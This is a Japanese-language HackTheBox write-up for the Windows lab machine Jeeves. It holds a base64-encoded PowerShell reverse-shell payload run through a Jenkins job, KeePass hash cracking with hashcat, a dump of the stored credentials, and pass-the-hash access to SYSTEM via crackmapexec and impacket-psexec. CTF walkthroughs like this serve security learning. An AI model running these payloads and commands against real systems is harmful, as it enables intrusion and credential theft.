📝

【HackTheBox】Jeeves WriteUp

2023/03/01に公開

はじめに

今回はWindowsマシンのJeevesをやっていきます。Jenkinsのようですね、見返してみると簡単に見えますが、やっている間はわからないことだらけでした。
https://app.hackthebox.com/machines/114

やることリスト

  • Nmapポートスキャン
  • ディレクトリ確認
  • jenkins内でjob提出画面の確認
  • jenkinsのjobからpowershellコマンドを実行できることを確認
  • リバースシェルの取得 (user flag)
  • KeePassファイルがあるので確認
  • hashcatでパスワードのクラック
  • KeePassのパスワード、ハッシュを確認
  • ハッシュでシステム権限に入れることを確認
  • 攻略完了(root flag)

Enumeration

Nmap

ポートスキャンをしていきます。

nmap -sC -sV jeeves.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 06:53 EST
Nmap scan report for jeeves.htb (10.129.228.112)
Host is up (0.21s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-02-28T16:53:57
|_  start_date: 2023-02-28T16:48:22
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.25 seconds

windowsマシンであることがわかりました。SMBが怪しいですね。

ディレクトリ確認

Gobuster

Http port 80

gobuster dir -k -u http://jeeves.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

何も出てきませんでした。

Http port 50000

 gobuster dir -k -u http://jeeves.htb:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

/askjeeves            (Status: 302) [Size: 0] [--> http://jeeves.htb:50000/askjeeves/]
Progress: 220560 / 220561 (100.00%)

askjeevesは面白そうです。

SMB port 445

smbmap -H jeeves.htb        
[!] Authentication error on jeeves.htb

接続できませんでした。

Httpの確認

at 80


特に何もありません

at 50000

jeeves.htb:50000

Powered by Jetty:// 9.4.z-SNAPSHOT

![[Pasted image 20230228215215.png]]

jeeves.htb:50000/askjeeves/


Jobを提出できるようです。これは使えそうです。

Jenkins version 2.87

Scriptを動かす

実際にスクリプトを動かすことができます。RevShellを取るのに使い勝手が悪かったので実際には使ってません。

println "cmd /c whoami".execute().text

Build

New item以下で新しくjobを作ることができます。名前は何でも構いません。

Windowsコマンドを試します。

We want to see whatever result, so lets try whoami.
Whoamiしてみましょう。


Buildしてコンソールアウトプットを確認すると、whoamiができていることが確認できます。

Foothold

Reverse Shell

Reverse Shell用のjobの作成

以下からRevShellペイロードを持ってきます。
https://www.revshells.com/ PowerShell#3 (Base64)

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA5ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

これをjobに追加します。

nc listen

nc -lnvp 1234              
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.228.112] 49676
whoami
jeeves\kohsuke
PS C:\Users\Administrator\.jenkins\workspace\revshell> 

取れました!

Privilege Escalation

Enumeration

net userの確認

PS C:\Users\kohsuke\Desktop> net user

User accounts for \\JEEVES

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
kohsuke                  
The command completed successfully.

特に何もありません。

kohsuke/Document

PS C:\Users\kohsuke\Documents> ls
    Directory: C:\Users\kohsuke\Documents
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx                                                              

.kdbxがあります。KeePassのファイルのようです。パスワードが入っているはずなので開けます。

手元にファイルを持ってくる

jenkinsからファイルをダウンロードすることができるので、特定のフォルダにファイルをコピーします。

Directory: C:\Users\Administrator\.jenkins\workspace


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----         3/1/2023   4:56 AM                revshell                                                              
d-----         3/1/2023   4:47 AM                test                                                                  


tofuという名前のフォルダを作り、その中に先ほどのファイルをコピーします。
PS C:\Users\Administrator\.jenkins\workspace\revshell\tofu>

ファイルのコピーとダウンロード

PS C:\Users\Administrator\.jenkins\workspace\revshell\tofu> copy C:\Users\kohsuke\Documents\CEH.kdbx .

Hashcat

Hashcatを使ってこじ開けます。

┌──(kali㉿kali)-[~/Downloads]
└─$ keepass2john CEH.kdbx 
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
                                            
┌──(kali㉿kali)-[~/Downloads]
└─$ keepass2john CEH.kdbx > CEH.kdbx.hash

Hash化したファイルを使い実際に実行します。

hashcat ~/Desktop/CEH.kdbx.hash /usr/share/wordlists/rockyou.txt --user -m 13400     
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-11th Gen Intel(R) Core(TM) i7-11700 @ 2.50GHz, 2918/5900 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Wed Mar  1 01:35:53 2023 (21 secs)
Time.Estimated...: Wed Mar  1 01:36:14 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2598 H/s (8.17ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 55296/14344385 (0.39%)
Rejected.........: 0/55296 (0.00%)
Restore.Point....: 54272/14344385 (0.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5888-6000
Candidate.Engine.: Device Generator
Candidates.#1....: 250895 -> grad2010
Hardware.Mon.#1..: Util:100%

Started: Wed Mar  1 01:35:47 2023
Stopped: Wed Mar  1 01:36:16 2023

KeePassを見る

kpcliで中身を見ることができるので、インストールします。

 kpcli --kdb CEH.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> find .
Searching for "." ...
 - 8 matches found and placed into /_found/
Would you like to list them now? [y/N] 
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com

moonshine1がパスワードであることはhashcatでわかっています。

エントリーをすべて表示します。

kpcli:/> find .
Searching for "." ...
 - 8 matches found and placed into /_found/
Would you like to list them now? [y/N] 
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com
kpcli:/> 
kpcli:/> show -f 0

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

kpcli:/> show -f 1

 Path: /CEH/
Title: Bank of America
Uname: Michael321
 Pass: 12345
  URL: https://www.bankofamerica.com
Notes: 

kpcli:/> show -f 2

 Path: /CEH/
Title: DC Recovery PW
Uname: administrator
 Pass: S1TjAtJHKsugh9oC4VZl
  URL: 
Notes: 

kpcli:/> show -f 3

 Path: /CEH/
Title: EC-Council
Uname: hackerman123
 Pass: pwndyouall!
  URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
Notes: Personal login

kpcli:/> show -f 4

 Path: /CEH/
Title: It's a secret
Uname: admin
 Pass: F7WhTrSFDKB6sxHU1cUn
  URL: http://localhost:8180/secret.jsp
Notes: 

kpcli:/> show -f 5

 Path: /CEH/
Title: Jenkins admin
Uname: admin
 Pass: 
  URL: http://localhost:8080
Notes: We don't even need creds! Unhackable! 

kpcli:/> show -f 6

 Path: /CEH/
Title: Keys to the kingdom
Uname: bob
 Pass: lCEUnYPjNfIuPZSzOySA
  URL: 
Notes: 

kpcli:/> show -f 7

 Path: /CEH/
Title: Walmart.com
Uname: anonymous
 Pass: Password
  URL: http://www.walmart.com
Notes: Getting my shopping on

パスワードを集める

passwords

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
12345
S1TjAtJHKsugh9oC4VZl
pwndyouall!
F7WhTrSFDKB6sxHU1cUn
lCEUnYPjNfIuPZSzOySA
Password

Foothold

Crackmapexec

パスワードリストを使ってsmbに入ります。

crackmapexec smb jeeves.htb -u Administrator -p passwords
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         jeeves.htb      445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:12345 STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:pwndyouall! STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:F7WhTrSFDKB6sxHU1cUn STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:lCEUnYPjNfIuPZSzOySA STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:Password STATUS_LOGON_FAILURE 

入れませんでした。

ハッシュの確認

Passのハッシュがありますね。

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

Windows の NTLM認証で使用されるハッシュかもしれません。

Crackstation

https://crackstation.net/

ダメです。

再度crackmapexec

crackmapexec smb jeeves.htb -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         jeeves.htb      445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         jeeves.htb      445    JEEVES           [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)       

これもだめです。

Psexec

https://github.com/fortra/impacket
impacketのpsexecにハッシュを渡してwinマシンに入ります。

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@jeeves.htb cmd.exe
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on jeeves.htb.....
[*] Found writable share ADMIN$
[*] Uploading file pgAKkTVF.exe
[*] Opening SVCManager on jeeves.htb.....
[*] Creating service hmME on jeeves.htb.....
[*] Starting service hmME.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

システム権限を取ることができました。

Desktop

Directory of C:\Users\Administrator\Desktop

e 03/01/2023  07:14 AM    <DIR>          .
03/01/2023  07:14 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
03/01/2023  07:14 AM                 0 ls
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)            833 bytes
               2 Dir(s)   2,638,098,432 bytes free

C:\Users\Administrator\Desktop> dir
The system cannot find the file specified.
 
C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere.  Look deeper.

Rootフラッグがありませんね。もっと深くまで見ろと言っているのでみます。
dir /Rします。

 Directory of C:\Users\Administrator\Desktop

03/01/2023  07:14 AM    <DIR>          .
03/01/2023  07:14 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
03/01/2023  07:14 AM                 0 ls
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)            833 bytes
               2 Dir(s)   2,638,098,432 bytes free

root.txtがみえますね!なのでmoreにリダイレクトします。

Flag

C:\Users\Administrator\Desktop> more < hm.txt:root.txt

参考

https://0xdf.gitlab.io/2022/04/14/htb-jeeves.html

Discussion